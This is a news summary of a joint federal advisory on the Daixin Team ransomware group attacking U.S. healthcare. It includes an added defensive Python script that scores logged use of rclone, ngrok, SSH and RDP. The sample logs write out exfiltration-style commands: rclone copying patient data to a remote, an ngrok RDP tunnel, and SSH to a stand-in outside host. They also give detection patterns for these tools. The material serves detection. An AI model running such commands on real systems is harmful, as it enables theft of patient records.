
FBI, CISA Warn Against New Daixin Team Targeting Healthcare

The FBI, CISA, and HHS have issued a joint advisory about a new ransomware group that is actively targeting healthcare organizations in the U.S.

Highlights from the advisory

According to the advisory, a new cybercrime group called Daixin Team has been targeting multiple healthcare organizations since June.
  • The attackers deploy ransomware to encrypt data on servers used for a range of services, including electronic health records, diagnostics, imaging, and intranet services.
  • Before encrypting, the group exfiltrates Personally Identifiable Information (PII) and Patient Health Information (PHI). This data is later used to extort the victims.
  • The group’s ransomware is believed to be based on leaked Babuk Locker source code.

Attack vectors

Daixin Team generally gains initial access to victims’ networks through VPN servers, and two distinct attack vectors have been observed recently: in one intrusion the group exploited an unpatched vulnerability in an organization’s VPN server, and in another it used compromised credentials to access a legacy VPN server.

What more?

  • Beyond VPN servers, the group has also been observed using legitimate tools such as Remote Desktop Protocol (RDP), Rclone, Ngrok, and SSH for data exfiltration.
  • The ransomware can target ESXi servers, where it encrypts files under /vmfs/volumes with extensions such as .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn.
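The exfiltration tools named above (RDP, Rclone, Ngrok, SSH) are all legitimate software, so a defender cannot simply block them; the useful detection is to score process-creation events by how unusual the tool is on a given host and what its command line points at. The following script is an added illustration of that triage, not code from the advisory or from Cyware. The JSON log lines, the host names, the scoring weights, and the command-line heuristics are all constructed assumptions for the example; the "external destination" check treats anything outside RFC 1918 and loopback ranges as external, which a real deployment would tune to its own address plan.

```python
"""Score process-creation events for the exfiltration tooling named in the advisory.

Hypothetical example, not from CISA/FBI/HHS or Cyware. Log lines are constructed
JSON objects with the fields host, user, image (executable path) and cmdline.
"""
import ipaddress
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Base scores (assumed): rclone and ngrok are rarely legitimate on servers,
# while ssh and the Windows RDP client (mstsc) are everyday tools and only
# become interesting in combination with other signals.
TOOL_SCORES = {"rclone": 3, "ngrok": 3, "ssh": 1, "mstsc": 1}

# Command-line hints that raise confidence (assumed heuristics).
CMDLINE_HINTS = [
    (re.compile(r"\brclone\b.*\b(copy|sync|move)\b", re.I), 2),  # rclone pushing data to a remote
    (re.compile(r"\bngrok\b.*\b(tcp|http)\b", re.I), 2),          # ngrok exposing a local service
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class Finding:
    host: str
    user: str
    tool: str
    score: int
    reason: str


def basename(image: str) -> str:
    """Return the lower-cased executable name without directory or .exe suffix."""
    name = re.split(r"[\\/]", image)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def is_external(ip: str) -> bool:
    """True when the address is outside the assumed internal ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def score_event(event: dict) -> Optional[Finding]:
    """Score one event; None when the executable is not a tool of interest."""
    tool = basename(event.get("image", ""))
    if tool not in TOOL_SCORES:
        return None
    score = TOOL_SCORES[tool]
    reasons = [f"process {tool}"]
    cmd = event.get("cmdline", "")
    for pattern, bonus in CMDLINE_HINTS:
        if pattern.search(cmd):
            score += bonus
            reasons.append(f"cmdline matches {pattern.pattern!r}")
    for ip in IPV4.findall(cmd):
        if is_external(ip):
            score += 2
            reasons.append(f"external destination {ip}")
    return Finding(event.get("host", "?"), event.get("user", "?"), tool, score, "; ".join(reasons))


def triage(log_lines: List[str], threshold: int = 3) -> List[Finding]:
    """Parse JSON events and return findings at or above the score threshold."""
    findings = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole run
        finding = score_event(event)
        if finding and finding.score >= threshold:
            findings.append(finding)
    return findings


# Constructed sample events (hosts, users, paths and addresses are invented;
# 203.0.113.10 is from the documentation range and stands in for an outside host).
SAMPLE_LOGS = [
    '{"host":"ehr-db01","user":"svc_backup","image":"C:\\\\Windows\\\\System32\\\\svchost.exe","cmdline":"svchost.exe -k netsvcs"}',
    '{"host":"ehr-db01","user":"admin","image":"C:\\\\Users\\\\admin\\\\rclone.exe","cmdline":"rclone.exe copy D:\\\\patients remote:dump --transfers 8"}',
    '{"host":"pacs-01","user":"root","image":"/tmp/ngrok","cmdline":"ngrok tcp 3389"}',
    '{"host":"jump-01","user":"ops","image":"/usr/bin/ssh","cmdline":"ssh ops@10.20.30.40"}',
    '{"host":"jump-01","user":"ops","image":"/usr/bin/ssh","cmdline":"ssh -p 2222 ops@203.0.113.10"}',
    '{"host":"ws-17","user":"jdoe","image":"C:\\\\Windows\\\\System32\\\\mstsc.exe","cmdline":"mstsc.exe /v:10.0.0.5"}',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f"{f.host:8} {f.user:10} {f.tool:6} score={f.score} ({f.reason})")
```

Run as written, the script flags the rclone copy and the ngrok tunnel at score 5 and the SSH session to the outside address at score 3, while the internal SSH and RDP sessions stay below the threshold. The point of the weighting is that a hospital network cannot alert on every RDP or SSH session, but the same tools pointed at an external address, or accompanied by rclone or ngrok on a server that never needed them, are worth an analyst's time.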

Summing up

The federal agencies have laid out steps for mitigating ransomware attacks by Daixin Team. These include keeping operating systems, software, and firmware updated. Organizations must deploy MFA wherever possible, secure and monitor RDP, and implement network segmentation.
Publisher

Cyware